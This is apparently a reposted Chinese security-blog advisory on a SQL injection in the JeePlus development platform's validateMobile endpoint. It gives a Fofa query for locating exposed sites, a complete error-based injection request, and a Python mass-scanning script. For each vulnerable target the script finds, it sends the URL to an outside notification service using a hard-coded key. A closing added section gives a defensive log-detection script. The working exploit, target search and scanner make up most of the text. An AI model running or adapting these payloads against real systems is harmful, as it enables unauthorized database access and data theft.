JeePlus Rapid Development Platform validateMobile SQL Injection

admin, 2024-03-18 17:22:51

Vulnerability description

The JeePlus Rapid Development Platform has a SQL injection in validateMobile. An attacker can use the flaw to execute arbitrary SQL statements, for example to query or dump data, write a webshell, execute system commands, or bypass login restrictions.

Reproduction

Fofa

app="JeePlus"


Part of the interface is shown in the original screenshot.

The reproduction process is as follows:

GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close


红岸 script


Core code

# JeePlus_validateMobile_SQL_scan.py
import urllib.parse
import urllib.request

import requests
from requests.exceptions import Timeout
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def sc_send(text, desp='', key='[SENDKEY]'):
    # Push a notification through the ServerChan (Server酱) API
    postdata = urllib.parse.urlencode({'text': text, 'desp': desp}).encode('utf-8')
    urlserver = f'https://sctapi.ftqq.com/{key}.send'
    req = urllib.request.Request(urlserver, data=postdata, method='POST')
    with urllib.request.urlopen(req) as response:
        result = response.read().decode('utf-8')
    return result


# ServerChan send key, hard-coded in the original script
key = "SCT212695TeKe1ATgRMkA7f7jyrOOkH9GX"


def scan_JeePlus_validateMobile_SQL(url, proxies, headers, append_to_output):
    if url.endswith("/"):
        path = "a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271"
    else:
        path = "/a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271"
    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url
    # The proxies and headers arguments are overridden here, as in the original:
    # every request is sent through a local proxy on 127.0.0.1:8080 (e.g. Burp)
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',
        'Accept-Encoding': 'gzip',
    }
    encodetext = url + path
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        req = requests.get(encodetext, headers=headers, verify=False, timeout=10, proxies=proxies)
        # A 500 response whose body contains the MySQL XPATH error means the injected expression was evaluated
        if req.status_code == 500 and 'XPATH' in req.text:
            append_to_output(f"[+] {url} 存在JeePlus快速开发平台 validateMobile SQL注入!!!!", "red")
            ret = sc_send('JeePlus快速开发平台 validateMobile SQL注入', f"漏洞连接: {url}\r\n漏洞类型: SQL注入", key)
        else:
            append_to_output(f"[-] {url} 不存在JeePlus快速开发平台 validateMobile SQL注入", "green")
    except Timeout:
        append_to_output(f"[!] 请求超时,跳过URL: {url}", "yellow")
    except Exception as e:
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow")
        else:
            append_to_output(str(e), "yellow")
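For the defending side, as an added example that is not part of the original post or the 红岸 tool: a log check that URL-decodes the `mobile` parameter on the endpoint above and flags the error-based pattern the PoC relies on (`updatexml`/`extractvalue` in the value) as well as lone-quote probes that produced a 500, which is exactly the signal the scanner above keys on. The access-log lines, the endpoint-to-parameter table and the verdict names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from a real server): line 1 carries the page's
# payload, line 2 a normal lookup, line 3 a lone quote that produced a 500 (a probe).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Mar/2024:17:22:51 +0800] "GET /a/sys/user/validateMobile'
    '?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user'
    '%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1" 500 1342',
    '10.0.0.6 - - [18/Mar/2024:17:23:02 +0800] "GET /a/sys/user/validateMobile'
    '?mobile=13800138000 HTTP/1.1" 200 17',
    '10.0.0.7 - - [18/Mar/2024:17:23:40 +0800] "GET /a/sys/user/validateMobile'
    '?mobile=13800138000%27 HTTP/1.1" 500 1342',
]

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# MySQL XPath error functions (how the page's payload leaks data through the 500
# page) plus the usual union/time-based markers.
SQLI_RE = re.compile(
    r"(?i)\b(updatexml|extractvalue)\s*\(|\bunion\s+select\b|\bsleep\s*\(|\bbenchmark\s*\("
)
# Endpoint -> parameter to inspect; only the one named on the page is listed.
WATCHED = {"/a/sys/user/validateMobile": "mobile"}

def classify_line(line):
    """Return (path, decoded_value, verdict), or None if the line is not a watched endpoint."""
    m = LOG_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    param = WATCHED.get(parts.path)
    if param is None:
        return None
    # parse_qs decodes %27 and '+' and tolerates the stray leading '&' in the PoC request
    value = parse_qs(parts.query).get(param, [""])[0]
    status = int(m.group("status"))
    if SQLI_RE.search(value):
        verdict = "sqli-error-based"
    elif "'" in value and status == 500:
        verdict = "sql-error-probe"
    elif re.fullmatch(r"\d{6,15}", value):
        verdict = "benign"
    else:
        verdict = "suspicious"
    return parts.path, value, verdict

def scan(lines):
    """Classify every watched request in an iterable of log lines."""
    return [r for r in map(classify_line, lines) if r is not None]
```

Pairing the decoded value with the 500 status is what separates a real error-based attempt from a user who typed a stray quote; a 200 with the same payload on a patched build would still be worth recording as a probe.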

Originally published on the WeChat public account 暗影网安实验室: JeePlus Rapid Development Platform validateMobile SQL Injection

Posted by admin on 2024-03-18 17:22:51. Please keep the link to this article when reposting (CN-SEC 中文网: thanks to the original author for their work): http://cn-sec.com/archives/2585090.html
